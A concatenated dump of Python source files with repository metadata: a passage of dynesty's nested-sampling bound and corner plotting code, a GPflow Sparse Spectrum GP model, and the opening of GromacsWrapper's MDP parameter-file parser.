            # runs) and the ValueError raised above, falling back to the
            # batch-based reconstruction below.
            # In the dynamic sampling case, we will show the live points used
            # during the batch associated with a particular iteration/bound.
            batch = results['samples_batch'][it] # select batch
            nbatch = results['batch_nlive'][batch] # nlive in the batch
            bsel = results['samples_batch'] == batch # select batch
            niter_eff = sum(bsel) - nbatch # "effective" iterations in batch
            # Grab our final set of live points (with proper IDs).
            samples = results['samples_u'][bsel]
            samples_id = results['samples_id'][bsel]
            samples_id -= min(samples_id) # re-index to start at zero
            ndim = samples.shape[1]
            live_u = np.empty((nbatch, ndim))
            live_u[samples_id[-nbatch:]] = samples[-nbatch:]
            # Find generating bound ID if necessary.
            if it is None:
                it = results['samples_it'][idx]
            it_eff = sum(bsel[:it + 1]) # effective iteration in batch
            # Run our sampling backwards.
            for i in range(1, niter_eff - it_eff + 1):
                r = -(nbatch + i)
                uidx = samples_id[r]
                live_u[uidx] = samples[r]
    rstate = get_random_generator()
    # Draw samples from the bounding distribution.
    # RadFriends/SupFriends bounds are defined relative to the live points,
    # so those need the reconstructed `live_u`; all other bounds are "fixed"
    # and can be sampled directly.
    if not isinstance(bound, bounding.RadFriends) and not isinstance(
            bound, bounding.SupFriends):
        # If bound is "fixed", go ahead and draw samples from it.
        psamps = bound.samples(ndraws, rstate=rstate)
    else:
        # If bound is based on the distribution of live points at a
        # specific iteration, we need to reconstruct what those were.
        if not show_live:
            try:
                # Only reconstruct the run if we haven't done it already.
                nlive = results['nlive']
                niter = results['niter']
                if nsamps - niter != nlive:
                    raise ValueError("Cannot reconstruct bound because the "
                                     "final set of live points are not "
                                     "included in the results.")
                # Grab our final set of live points (with proper IDs).
                samples = results['samples_u']
                samples_id = results['samples_id']
                ndim = samples.shape[1]
                live_u = np.empty((nlive, ndim))
                live_u[samples_id[-nlive:]] = samples[-nlive:]
                # Run our sampling backwards.
                if it is None:
                    it = results['samples_it'][idx]
                for i in range(1, niter - it + 1):
                    r = -(nlive + i)
                    uidx = samples_id[r]
                    live_u[uidx] = samples[r]
            except:
                raise ValueError("Live point tracking currently not "
                                 "implemented for dynamic sampling results.")
        # Draw samples.
        psamps = bound.samples(ndraws, live_u, rstate=rstate)
    # Projecting samples to input dimensions and possibly
    # the native model space.
    if prior_transform is None:
        x1, x2 = psamps[:, dims].T
        if show_live:
            l1, l2 = live_u[:, dims].T
    else:
        # Remove points outside of the unit cube as appropriate.
        sel = [unitcheck(point, nonbounded) for point in psamps]
        vsamps = np.array(list(map(prior_transform, psamps[sel])))
        x1, x2 = vsamps[:, dims].T
        if show_live:
            lsamps = np.array(list(map(prior_transform, live_u)))
            l1, l2 = lsamps[:, dims].T
    # Setting up default plot layout.
    fig, axes = _make_subplots(fig, 1, 1, 6, 6)
    axes = axes[0, 0]
    # Plotting.
    axes.plot(x1, x2, color=color, zorder=1, **plot_kwargs)
    if show_live:
        # Live points drawn on top of the bound samples.
        axes.plot(l1, l2, color=live_color, zorder=2, **live_kwargs)
    # Setup axes
    if span is not None:
        axes.set_xlim(span[0])
        axes.set_ylim(span[1])
    if max_n_ticks == 0:
        axes.xaxis.set_major_locator(NullLocator())
        axes.yaxis.set_major_locator(NullLocator())
    else:
        axes.xaxis.set_major_locator(MaxNLocator(max_n_ticks))
        axes.yaxis.set_major_locator(MaxNLocator(max_n_ticks))
    # Label axes.
    sf = ScalarFormatter(useMathText=use_math_text)
    axes.xaxis.set_major_formatter(sf)
    axes.yaxis.set_major_formatter(sf)
    if labels is not None:
        axes.set_xlabel(labels[0], **label_kwargs)
        axes.set_ylabel(labels[1], **label_kwargs)
    else:
        # Default 1-indexed LaTeX-style labels.
        axes.set_xlabel(r"$x_{" + str(dims[0] + 1) + "}$", **label_kwargs)
        axes.set_ylabel(r"$x_{" + str(dims[1] + 1) + "}$", **label_kwargs)
    return fig, axes
def cornerbound(results,
                it=None,
                idx=None,
                dims=None,
                prior_transform=None,
                periodic=None,
                reflective=None,
                ndraws=5000,
                color='gray',
                plot_kwargs=None,
                labels=None,
                label_kwargs=None,
                max_n_ticks=5,
                use_math_text=False,
                show_live=False,
                live_color='darkviolet',
                live_kwargs=None,
                span=None,
                fig=None):
    """
    Return the bounding distribution used to propose either (1) live points
    at a given iteration or (2) a specific dead point during
    the course of a run, projected onto all pairs of dimensions.
    Parameters
    ----------
    results : :class:`~dynesty.results.Results` instance
        A :class:`~dynesty.results.Results` instance from a nested
        sampling run.
    it : int, optional
        If provided, returns the bounding distribution at the specified
        iteration of the nested sampling run. **Note that this option and
        `idx` are mutually exclusive.**
    idx : int, optional
        If provided, returns the bounding distribution used to propose the
        dead point at the specified iteration of the nested sampling run.
        **Note that this option and `it` are mutually exclusive.**
    dims : iterable of shape (ndim,), optional
        The subset of dimensions that should be plotted. If not provided,
        all dimensions will be shown.
    prior_transform : func, optional
        The function transforming samples within the unit cube back to samples
        in the native model space. If provided, the transformed bounding
        distribution will be plotted in the native model space.
    periodic : iterable, optional
        A list of indices for parameters with periodic boundary conditions.
        These parameters *will not* have their positions constrained to be
        within the unit cube, enabling smooth behavior for parameters
        that may wrap around the edge. Default is `None` (i.e. no periodic
        boundary conditions).
    reflective : iterable, optional
        A list of indices for parameters with reflective boundary conditions.
        These parameters *will not* have their positions constrained to be
        within the unit cube, enabling smooth behavior for parameters
        that may reflect at the edge. Default is `None` (i.e. no reflective
        boundary conditions).
    ndraws : int, optional
        The number of random samples to draw from the bounding distribution
        when plotting. Default is `5000`.
    color : str, optional
        The color of the points randomly sampled from the bounding
        distribution. Default is `'gray'`.
    plot_kwargs : dict, optional
        Extra keyword arguments used when plotting the bounding draws.
    labels : iterable with shape (ndim,), optional
        A list of names for each parameter. If not provided, the default name
        used when plotting will be in :math:`x_i` style.
    label_kwargs : dict, optional
        Extra keyword arguments that will be sent to the
        `~matplotlib.axes.Axes.set_xlabel` and
        `~matplotlib.axes.Axes.set_ylabel` methods.
    max_n_ticks : int, optional
        Maximum number of ticks allowed. Default is `5`.
    use_math_text : bool, optional
        Whether the axis tick labels for very large/small exponents should be
        displayed as powers of 10 rather than using `e`. Default is `False`.
    show_live : bool, optional
        Whether the live points at a given iteration (for `it`) or
        associated with the bounding (for `idx`) should be highlighted.
        Default is `False`. In the dynamic case, only the live points
        associated with the batch used to construct the relevant bound
        are plotted.
    live_color : str, optional
        The color of the live points. Default is `'darkviolet'`.
    live_kwargs : dict, optional
        Extra keyword arguments used when plotting the live points.
    span : iterable with shape (2,), optional
        A list where each element is a length-2 tuple containing
        lower and upper bounds. Default is `None` (no bound).
    fig : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`), optional
        If provided, overplot the draws onto the provided figure.
        Otherwise, by default an internal figure is generated.
    Returns
    -------
    cornerbound : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`)
        Output corner plot of the bounding distribution.
    """
    # Initialize values.
    if label_kwargs is None:
        label_kwargs = dict()
    if plot_kwargs is None:
        plot_kwargs = dict()
    if live_kwargs is None:
        live_kwargs = dict()
    # Check that either `idx` or `it` is specified.
    if (it is None and idx is None) or (it is not None and idx is not None):
        raise ValueError("You must specify either an iteration or an index!")
    # Set defaults.
    plot_kwargs['marker'] = plot_kwargs.get('marker', 'o')
    plot_kwargs['linestyle'] = plot_kwargs.get('linestyle', 'None')
    plot_kwargs['markersize'] = plot_kwargs.get('markersize', 1)
    plot_kwargs['alpha'] = plot_kwargs.get('alpha', 0.4)
    live_kwargs['marker'] = live_kwargs.get('marker', 'o')
    live_kwargs['linestyle'] = live_kwargs.get('linestyle', 'None')
    live_kwargs['markersize'] = live_kwargs.get('markersize', 1)
    # Extract bounding distributions.
    try:
        bounds = results['bound']
    except KeyError:
        raise ValueError("No bounds were saved in the results!")
    nsamps = len(results['samples'])
    # Mask marking dimensions unconstrained by the unit cube
    # (periodic/reflective); used to filter out-of-cube proposals below.
    nonbounded = get_nonbounded(bounds[0].n, periodic, reflective)
    if it is not None:
        if it >= nsamps:
            raise ValueError("The iteration requested goes beyond the "
                             "number of iterations in the run.")
        # Extract bound iterations.
        try:
            bound_iter = np.array(results['bound_iter'])
        except KeyError:
            raise ValueError("Cannot reconstruct the bound used at the "
                             "specified iteration since bound "
                             "iterations were not saved in the results.")
        # Find bound at the specified iteration.
        if it == 0:
            pidx = 0
        else:
            pidx = bound_iter[it]
    else:
        if idx >= nsamps:
            raise ValueError("The index requested goes beyond the "
                             "number of samples in the run.")
        try:
            samples_bound = results['samples_bound']
        except:
            raise ValueError("Cannot reconstruct the bound used to "
                             "compute the specified dead point since "
                             "sample bound indices were not saved "
                             "in the results.")
        # Grab relevant bound.
        pidx = samples_bound[idx]
    # Get desired bound.
    bound = bounds[pidx]
    # Do we want to show the live points at the specified iteration?
    # If so, we need to rewind our bound to check.
    # (We could also go forward; this is an arbitrary choice.)
    if show_live:
        try:
            # We can only reconstruct the run if the final set of live points
            # were added to the results. This is true by default for dynamic
            # nested sampling runs but not guaranteed for standard runs.
            nlive = results['nlive']
            niter = results['niter']
            if nsamps - niter != nlive:
                raise ValueError("Cannot reconstruct bound because the "
                                 "final set of live points are not included "
                                 "in the results.")
            # Grab our final set of live points (with proper IDs).
            samples = results['samples_u']
            samples_id = results['samples_id']
            ndim = samples.shape[1]
            live_u = np.empty((nlive, ndim))
            live_u[samples_id[-nlive:]] = samples[-nlive:]
            # Find generating bound ID if necessary.
            if it is None:
                it = results['samples_it'][idx]
            # Run our sampling backwards.
            for i in range(1, niter - it + 1):
                r = -(nlive + i)
                uidx = samples_id[r]
                live_u[uidx] = samples[r]
        except:
            # NOTE(review): this broad `except` is deliberate control flow —
            # it catches both missing-key errors (e.g. no 'nlive' for dynamic
            # runs) and the ValueError raised above, falling back to the
            # batch-based reconstruction below.
            # In the dynamic sampling case, we will show the live points used
            # during the batch associated with a particular iteration/bound.
            if it is not None:
                batch = results['samples_batch'][it] # select batch
            else:
                batch = results['samples_batch'][idx]
            nbatch = results['batch_nlive'][batch] # nlive in the batch
            bsel = results['samples_batch'] == batch # select batch
            niter_eff = sum(bsel) - nbatch # "effective" iterations in batch
            # Grab our final set of live points (with proper IDs).
            samples = results['samples_u'][bsel]
            samples_id = results['samples_id'][bsel]
            samples_id -= min(samples_id) # re-index to start at zero
            ndim = samples.shape[1]
            live_u = np.empty((nbatch, ndim))
            live_u[samples_id[-nbatch:]] = samples[-nbatch:]
            # Find generating bound ID if necessary.
            if it is None:
                it = results['samples_it'][idx]
            it_eff = sum(bsel[:it + 1]) # effective iteration in batch
            # Run our sampling backwards.
            for i in range(1, niter_eff - it_eff + 1):
                r = -(nbatch + i)
                uidx = samples_id[r]
                live_u[uidx] = samples[r]
    rstate = get_random_generator()
    # Draw samples from the bounding distribution.
    # NOTE(review): EAFP — bounds defined relative to the live points raise
    # when sampled without them, triggering the reconstruction fallback.
    try:
        # If bound is "fixed", go ahead and draw samples from it.
        psamps = bound.samples(ndraws, rstate=rstate)
    except:
        # If bound is based on the distribution of live points at a
        # specific iteration, we need to reconstruct what those were.
        if not show_live:
            # Only reconstruct the run if we haven't done it already.
            nlive = results['nlive']
            niter = results['niter']
            if nsamps - niter != nlive:
                raise ValueError("Cannot reconstruct bound because the "
                                 "final set of live points are not included "
                                 "in the results.")
            # Grab our final set of live points (with proper IDs).
            samples = results['samples_u']
            samples_id = results['samples_id']
            ndim = samples.shape[1]
            live_u = np.empty((nlive, ndim))
            live_u[samples_id[-nlive:]] = samples[-nlive:]
            # Run our sampling backwards.
            if it is None:
                it = results['samples_it'][idx]
            for i in range(1, niter - it + 1):
                r = -(nlive + i)
                uidx = samples_id[r]
                live_u[uidx] = samples[r]
        # Draw samples.
        psamps = bound.samples(ndraws, live_u, rstate=rstate)
    # Projecting samples to input dimensions and possibly
    # the native model space.
    if prior_transform is None:
        psamps = psamps.T
        if show_live:
            lsamps = live_u.T
    else:
        # Remove points outside of the unit cube.
        sel = [unitcheck(point, nonbounded) for point in psamps]
        psamps = np.array(list(map(prior_transform, psamps[sel])))
        psamps = psamps.T
        if show_live:
            lsamps = np.array(list(map(prior_transform, live_u)))
            lsamps = lsamps.T
    # Subsample dimensions.
    if dims is not None:
        psamps = psamps[dims]
        if show_live:
            lsamps = lsamps[dims]
    ndim = psamps.shape[0]
    # Set labels.
    if labels is None:
        labels = [r"$x_{" + str(i + 1) + "}$" for i in range(ndim)]
    # Setup axis layout (from `corner.py`).
    factor = 2.0 # size of side of one panel
    lbdim = 0.5 * factor # size of left/bottom margin
    trdim = 0.2 * factor # size of top/right margin
    whspace = 0.05 # size of width/height margin
    plotdim = factor * (ndim - 1.) + factor * (ndim - 2.) * whspace
    dim = lbdim + plotdim + trdim # total size
    # Initialize figure.
    fig, axes = _make_subplots(fig, ndim - 1, ndim - 1, dim, dim)
    # Format figure.
    lb = lbdim / dim
    tr = (lbdim + plotdim) / dim
    fig.subplots_adjust(left=lb,
                        bottom=lb,
                        right=tr,
                        top=tr,
                        wspace=whspace,
                        hspace=whspace)
    # Plot the 2-D projected samples.
    # Pairs (i, j) index the (ndim-1) x (ndim-1) lower-triangular grid of
    # dimension pairs; x runs over rows (dims 1..ndim-1), y over columns
    # (dims 0..ndim-2).
    for i, x in enumerate(psamps[1:]):
        for j, y in enumerate(psamps[:-1]):
            try:
                ax = axes[i, j]
            except:
                # ndim == 2 yields a single Axes rather than a 2-D array.
                ax = axes
            # Setup axes.
            if span is not None:
                ax.set_xlim(span[j])
                ax.set_ylim(span[i])
            if j > i:
                # Upper triangle: hide the unused panel.
                ax.set_frame_on(False)
                ax.set_xticks([])
                ax.set_yticks([])
                continue
            if max_n_ticks == 0:
                ax.xaxis.set_major_locator(NullLocator())
                ax.yaxis.set_major_locator(NullLocator())
            else:
                ax.xaxis.set_major_locator(
                    MaxNLocator(max_n_ticks, prune="lower"))
                ax.yaxis.set_major_locator(
                    MaxNLocator(max_n_ticks, prune="lower"))
            # Label axes.
            sf = ScalarFormatter(useMathText=use_math_text)
            ax.xaxis.set_major_formatter(sf)
            ax.yaxis.set_major_formatter(sf)
            if i < ndim - 2:
                ax.set_xticklabels([])
            else:
                [l.set_rotation(45) for l in ax.get_xticklabels()]
                ax.set_xlabel(labels[j], **label_kwargs)
                ax.xaxis.set_label_coords(0.5, -0.3)
            if j > 0:
                ax.set_yticklabels([])
            else:
                [l.set_rotation(45) for l in ax.get_yticklabels()]
                ax.set_ylabel(labels[i + 1], **label_kwargs)
                ax.yaxis.set_label_coords(-0.3, 0.5)
            # Plot distribution.
            ax.plot(y, x, c=color, **plot_kwargs)
            # Add live points.
            if show_live:
                ax.plot(lsamps[j], lsamps[i + 1], c=live_color, **live_kwargs)
    return (fig, axes)
def _hist2d(x,
            y,
            smooth=0.02,
            span=None,
            weights=None,
            levels=None,
            ax=None,
            color='gray',
            plot_datapoints=False,
            plot_density=True,
            plot_contours=True,
            no_fill_contours=False,
            fill_contours=True,
            contour_kwargs=None,
            contourf_kwargs=None,
            data_kwargs=None,
            **kwargs):
    """
    Internal function called by :meth:`cornerplot` used to generate a
    a 2-D histogram/contour of samples.
    Parameters
    ----------
    x : interable with shape (nsamps,)
        Sample positions in the first dimension.
    y : iterable with shape (nsamps,)
        Sample positions in the second dimension.
    span : iterable with shape (ndim,), optional
        A list where each element is either a length-2 tuple containing
        lower and upper bounds or a float from `(0., 1.]` giving the
        fraction of (weighted) samples to include. If a fraction is provided,
        the bounds are chosen to be equal-tailed. An example would be::
            span = [(0., 10.), 0.95, (5., 6.)]
        Default is `0.999999426697` (5-sigma credible interval).
    weights : iterable with shape (nsamps,)
        Weights associated with the samples. Default is `None` (no weights).
    levels : iterable, optional
        The contour levels to draw. Default are `[0.5, 1, 1.5, 2]`-sigma.
    ax : `~matplotlib.axes.Axes`, optional
        An `~matplotlib.axes.axes` instance on which to add the 2-D histogram.
        If not provided, a figure will be generated.
    color : str, optional
        The `~matplotlib`-style color used to draw lines and color cells
        and contours. Default is `'gray'`.
    plot_datapoints : bool, optional
        Whether to plot the individual data points. Default is `False`.
    plot_density : bool, optional
        Whether to draw the density colormap. Default is `True`.
    plot_contours : bool, optional
        Whether to draw the contours. Default is `True`.
    no_fill_contours : bool, optional
        Whether to add absolutely no filling to the contours. This differs
        from `fill_contours=False`, which still adds a white fill at the
        densest points. Default is `False`.
    fill_contours : bool, optional
        Whether to fill the contours. Default is `True`.
    contour_kwargs : dict
        Any additional keyword arguments to pass to the `contour` method.
    contourf_kwargs : dict
        Any additional keyword arguments to pass to the `contourf` method.
    data_kwargs : dict
        Any additional keyword arguments to pass to the `plot` method when
        adding the individual data points.
    """
    if ax is None:
        ax = pl.gca()
    # Determine plotting bounds.
    data = [x, y]
    if span is None:
        span = [0.999999426697 for i in range(2)]
    span = list(span)
    if len(span) != 2:
        raise ValueError("Dimension mismatch between samples and span.")
    for i, _ in enumerate(span):
        try:
            # EAFP: a length-2 entry is already an explicit (lo, hi) bound.
            xmin, xmax = span[i]
        except:
            # Otherwise the entry is a scalar credible-interval fraction;
            # convert it to equal-tailed quantile bounds.
            q = [0.5 - 0.5 * span[i], 0.5 + 0.5 * span[i]]
            span[i] = _quantile(data[i], q, weights=weights)
    # The default "sigma" contour levels.
    if levels is None:
        levels = 1.0 - np.exp(-0.5 * np.arange(0.5, 2.1, 0.5)**2)
    # Color map for the density plot, over-plotted to indicate the
    # density of the points near the center.
    density_cmap = LinearSegmentedColormap.from_list("density_cmap",
                                                     [color, (1, 1, 1, 0)])
    # Color map used to hide the points at the high density areas.
    white_cmap = LinearSegmentedColormap.from_list("white_cmap", [(1, 1, 1),
                                                                  (1, 1, 1)],
                                                   N=2)
    # This "color map" is the list of colors for the contour levels if the
    # contours are filled.
    rgba_color = colorConverter.to_rgba(color)
    contour_cmap = [list(rgba_color) for l in levels] + [rgba_color]
    for i, l in enumerate(levels):
        # Increase alpha with level so inner (denser) contours are darker.
        contour_cmap[i][-1] *= float(i) / (len(levels) + 1)
    # Initialize smoothing.
    if (isinstance(smooth, int_type) or isinstance(smooth, float_type)):
        smooth = [smooth, smooth]
    bins = []
    svalues = []
    for s in smooth:
        if isinstance(s, int_type):
            # If `s` is an integer, the weighted histogram has
            # `s` bins within the provided bounds.
            bins.append(s)
            svalues.append(0.)
        else:
            # If `s` is a float, oversample the data relative to the
            # smoothing filter by a factor of 2, then use a Gaussian
            # filter to smooth the results.
            bins.append(int(round(2. / s)))
            svalues.append(2.)
    # We'll make the 2D histogram to directly estimate the density.
    try:
        H, X, Y = np.histogram2d(x.flatten(),
                                 y.flatten(),
                                 bins=bins,
                                 range=list(map(np.sort, span)),
                                 weights=weights)
    except ValueError:
        raise ValueError("It looks like at least one of your sample columns "
                         "have no dynamic range.")
    # Smooth the results.
    # NOTE: `svalues` is a Python list; `np.all` coerces the comparison
    # into an array, so this checks whether any Gaussian smoothing applies.
    if not np.all(svalues == 0.):
        H = norm_kde(H, svalues)
    # Compute the density levels.
    # Sort bin heights in descending order and find, for each requested
    # credible level, the smallest density threshold whose cumulative mass
    # still fits within that level.
    Hflat = H.flatten()
    inds = np.argsort(Hflat)[::-1]
    Hflat = Hflat[inds]
    sm = np.cumsum(Hflat)
    sm /= sm[-1]
    V = np.empty(len(levels))
    for i, v0 in enumerate(levels):
        try:
            V[i] = Hflat[sm <= v0][-1]
        except:
            # EAFP: no bins fit inside this level; fall back to the densest.
            V[i] = Hflat[0]
    V.sort()
    m = (np.diff(V) == 0)
    if np.any(m) and plot_contours:
        logging.warning("Too few points to create valid contours.")
    if np.all(m):
        logging.warning('No points at all in the plotted region')
    else:
        # Nudge duplicate levels apart so contouring gets strictly
        # increasing thresholds.
        while np.any(m):
            V[np.where(m)[0][0]] *= 1.0 - 1e-4
            m = (np.diff(V) == 0)
        V.sort()
    # Compute the bin centers.
    X1, Y1 = 0.5 * (X[1:] + X[:-1]), 0.5 * (Y[1:] + Y[:-1])
    # Extend the array for the sake of the contours at the plot edges.
    H2 = H.min() + np.zeros((H.shape[0] + 4, H.shape[1] + 4))
    H2[2:-2, 2:-2] = H
    H2[2:-2, 1] = H[:, 0]
    H2[2:-2, -2] = H[:, -1]
    H2[1, 2:-2] = H[0]
    H2[-2, 2:-2] = H[-1]
    H2[1, 1] = H[0, 0]
    H2[1, -2] = H[0, -1]
    H2[-2, 1] = H[-1, 0]
    H2[-2, -2] = H[-1, -1]
    X2 = np.concatenate([
        X1[0] + np.array([-2, -1]) * np.diff(X1[:2]), X1,
        X1[-1] + np.array([1, 2]) * np.diff(X1[-2:])
    ])
    Y2 = np.concatenate([
        Y1[0] + np.array([-2, -1]) * np.diff(Y1[:2]), Y1,
        Y1[-1] + np.array([1, 2]) * np.diff(Y1[-2:])
    ])
    # Plot the data points.
    if plot_datapoints:
        if data_kwargs is None:
            data_kwargs = dict()
        data_kwargs["color"] = data_kwargs.get("color", color)
        data_kwargs["ms"] = data_kwargs.get("ms", 2.0)
        data_kwargs["mec"] = data_kwargs.get("mec", "none")
        data_kwargs["alpha"] = data_kwargs.get("alpha", 0.1)
        ax.plot(x, y, "o", zorder=-1, rasterized=True, **data_kwargs)
    # Plot the base fill to hide the densest data points.
    if (plot_contours or plot_density) and not no_fill_contours:
        ax.contourf(X2,
                    Y2,
                    H2.T, [V.min(), H.max()],
                    cmap=white_cmap,
                    antialiased=False)
    if plot_contours and fill_contours:
        if contourf_kwargs is None:
            contourf_kwargs = dict()
        contourf_kwargs["colors"] = contourf_kwargs.get("colors", contour_cmap)
        contourf_kwargs["antialiased"] = contourf_kwargs.get(
            "antialiased", False)
        ax.contourf(X2, Y2, H2.T,
                    np.concatenate([[0], V, [H.max() * (1 + 1e-4)]]),
                    **contourf_kwargs)
    # Plot the density map. This can't be plotted at the same time as the
    # contour fills.
    elif plot_density:
        ax.pcolor(X, Y, H.max() - H.T, cmap=density_cmap)
    # Plot the contour edge colors.
    if plot_contours:
        if contour_kwargs is None:
            contour_kwargs = dict()
        contour_kwargs["colors"] = contour_kwargs.get("colors", color)
        ax.contour(X2, Y2, H2.T, V, **contour_kwargs)
    ax.set_xlim(span[0])
    ax.set_ylim(span[1])
|
joshspeagle/dynesty
|
py/dynesty/plotting.py
|
Python
|
mit
| 90,999
|
[
"Gaussian"
] |
465adc4ffa43217836c9cce17a39bfac5191e2b80ec3ac451b9b343d1c9c398e
|
# Copyright 2016 James Hensman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gpflow
import numpy as np
import tensorflow as tf
class SSGP(gpflow.models.GPModel):
"""
The Sparse Spectrum GP, judiciously copied from Miguel Lazaro Gredilla's
MATLAB code, available at http://www.tsc.uc3m.es/~miguel/downloads.php. His
code remains as comments in this file.
"""
def __init__(self, X, Y, kern, num_basis=10):
lik = gpflow.likelihoods.Gaussian()
mf = gpflow.mean_functions.Zero()
gpflow.model.GPModel.__init__(self, X, Y, kern=kern, likelihood=lik, mean_function=mf)
input_dim = self.X.shape[1]
if isinstance(kern, gpflow.kernels.RBF):
self.omega = gpflow.param.Param(np.random.randn(num_basis, input_dim))
elif isinstance(kern, gpflow.kernels.Matern12):
self.omega = gpflow.param.Param(np.random.standard_cauchy((num_basis, input_dim)))
elif isinstance(kern, gpflow.kernels.Matern32):
self.omega = gpflow.param.Param(np.random.standard_t(2, (num_basis, input_dim)))
elif isinstance(kern, gpflow.kernels.Matern52):
self.omega = gpflow.param.Param(np.random.standard_t(3, (num_basis, input_dim)))
else:
raise NotImplementedError
assert self.Y.shape[1] == 1
self.num_latent = 1
# m=(length(optimizeparams)-D-2)/D; % number of basis
# ell = exp(optimizeparams(1:D)); % characteristic lengthscale
# sf2 = exp(2*optimizeparams(D+1)); % signal power
# sn2 = exp(2*optimizeparams(D+2)); % noise power
# w = reshape(optimizeparams(D+3:end), [m, D]); % unscaled model angular frequencies
def build_likelihood(self):
# w = w./repmat(ell',[m,1]); % scaled model angular frequencies
w = self.omega / self.kern.lengthscales
m = tf.shape(self.omega)[0]
m_float = tf.cast(m, tf.float64)
# phi = x_tr*w';
phi = tf.matmul(self.X, tf.transpose(w))
# phi = [cos(phi) sin(phi)]; % design matrix
phi = tf.concat([tf.cos(phi), tf.sin(phi)], axis=1)
# R = chol((sf2/m)*(phi'*phi) + sn2*eye(2*m)); % calculate some often-used constants
A = (self.kern.variance / m_float) * tf.matmul(tf.transpose(phi), phi)\
+ self.likelihood.variance * gpflow.tf_wraps.eye(2*m)
RT = tf.cholesky(A)
R = tf.transpose(RT)
# PhiRiphi/R;
# RtiPhit = PhiRi';
RtiPhit = tf.matrix_triangular_solve(RT, tf.transpose(phi))
# Rtiphity=RtiPhit*y_tr;
Rtiphity = tf.matmul(RtiPhit, self.Y)
# % output NLML
# out1=0.5/sn2*(sum(y_tr.^2)-sf2/m*sum(Rtiphity.^2))+ ...
out = 0.5/self.likelihood.variance*(tf.reduce_sum(tf.square(self.Y)) -
self.kern.variance/m_float*tf.reduce_sum(tf.square(Rtiphity)))
# +sum(log(diag(R)))+(n/2-m)*log(sn2)+n/2*log(2*pi);
n = tf.cast(tf.shape(self.X)[0], tf.float64)
out += tf.reduce_sum(tf.log(tf.diag_part(R)))\
+ (n/2.-m_float) * tf.log(self.likelihood.variance)\
+ n/2*np.log(2*np.pi)
return -out
    def build_predict(self, Xnew, full_cov=False):
        """Return the predictive mean and variance at test inputs *Xnew*.

        Rebuilds the same trigonometric design matrix and Cholesky factor as
        :meth:`build_likelihood` (comments quote the MATLAB reference code),
        computes the basis-function weights ``alpha``, and evaluates the
        predictive distribution at the test design matrix ``phistar``.

        :param Xnew: test inputs, one row per test point.
        :param full_cov: if True return a full test covariance matrix
            (expanded to rank 3), otherwise per-point marginal variances.
        :return: tuple ``(mean, var)``.
        """
        # w = w./repmat(ell',[m,1]); % scaled model angular frequencies
        w = self.omega / self.kern.lengthscales
        m = tf.shape(self.omega)[0]
        m_float = tf.cast(m, tf.float64)
        # phi = x_tr*w';
        phi = tf.matmul(self.X, tf.transpose(w))
        # phi = [cos(phi) sin(phi)]; % design matrix
        phi = tf.concat([tf.cos(phi), tf.sin(phi)], axis=1)
        # R = chol((sf2/m)*(phi'*phi) + sn2*eye(2*m)); % calculate some often-used constants
        A = (self.kern.variance / m_float) * tf.matmul(tf.transpose(phi), phi)\
            + self.likelihood.variance * gpflow.tf_wraps.eye(2*m)
        RT = tf.cholesky(A)
        R = tf.transpose(RT)
        # RtiPhit = PhiRi';
        RtiPhit = tf.matrix_triangular_solve(RT, tf.transpose(phi))
        # Rtiphity=RtiPhit*y_tr;
        Rtiphity = tf.matmul(RtiPhit, self.Y)
        # alfa=sf2/m*(R\Rtiphity); % cosines/sines coefficients
        alpha = self.kern.variance / m_float * tf.matrix_triangular_solve(R, Rtiphity, lower=False)
        # phistar = x_tst*w';
        phistar = tf.matmul(Xnew, tf.transpose(w))
        # phistar = [cos(phistar) sin(phistar)]; % test design matrix
        phistar = tf.concat([tf.cos(phistar), tf.sin(phistar)], axis=1)
        # out1(beg_chunk:end_chunk) = phistar*alfa; % Predictive mean
        mean = tf.matmul(phistar, alpha)
        # % also output predictive variance
        # out2(beg_chunk:end_chunk) = sn2*(1+sf2/m*sum((phistar/R).^2,2));% Predictive variance
        RtiPhistart = tf.matrix_triangular_solve(RT, tf.transpose(phistar))
        PhiRistar = tf.transpose(RtiPhistart)
        # NB: do not add in noise variance to the predictive var: gpflow does that for us.
        if full_cov:
            # Full covariance; 1e-6 jitter on the diagonal for numerical stability.
            var = self.likelihood.variance * self.kern.variance / m_float *\
                tf.matmul(PhiRistar, tf.transpose(PhiRistar)) + \
                gpflow.tf_wraps.eye(tf.shape(Xnew)[0]) * 1e-6
            var = tf.expand_dims(var, 2)
        else:
            var = self.likelihood.variance * self.kern.variance / m_float * tf.reduce_sum(tf.square(PhiRistar), 1)
            var = tf.expand_dims(var, 1)
        return mean, var
|
jameshensman/VFF
|
VFF/ssgp.py
|
Python
|
apache-2.0
| 6,416
|
[
"Gaussian"
] |
fa9c241c1dee60a2250ec4676255e540b9303dc77fd9fd02fcb2c55639db50de
|
# GromacsWrapper: formats.py
# Copyright (c) 2009-2011 Oliver Beckstein <orbeckst@gmail.com>
# Released under the GNU Public License 3 (or higher, your choice)
# See the file COPYING for details.
"""
Gromacs parameter MDP file format
=================================
The `.mdp file`_ contains a list of keywords that are used to set up a
simulation with :class:`~gromacs.tools.Grompp`. The class :class:`MDP`
parses this file and provides access to the keys and values as ordered
dictionary.
.. _`.mdp file`: http://www.gromacs.org/Documentation/File_Formats/.mdp_File
.. autoclass:: MDP
:members:
"""
from __future__ import absolute_import, with_statement
import os, errno
import re
import warnings
import six
import numpy
from ..exceptions import ParseError, AutoCorrectionWarning
from .. import utilities
from collections import OrderedDict as odict
import logging
class MDP(odict, utilities.FileUtils):
    """Class that represents a Gromacs mdp run input file.

    The MDP instance is an ordered dictionary.

    - *Parameter names* are keys in the dictionary.
    - *Comments* are sequentially numbered with keys Comment0001,
      Comment0002, ...
    - *Empty lines* are similarly preserved as Blank0001, ....

    When writing, the dictionary is dumped in the recorded order to a
    file. Inserting keys at a specific position is not possible.

    Currently, comments after a parameter on the same line are
    discarded. Leading and trailing spaces are always stripped.

    .. SeeAlso:: For editing a mdp file one can also use
       :func:`gromacs.cbook.edit_mdp` (which works like a
       poor replacement for sed).
    """
    default_extension = "mdp"
    logger = logging.getLogger('gromacs.formats.MDP')

    # NOTE: patterns are raw strings; "\s" inside a plain string literal is an
    # invalid escape sequence and raises a DeprecationWarning/SyntaxWarning on
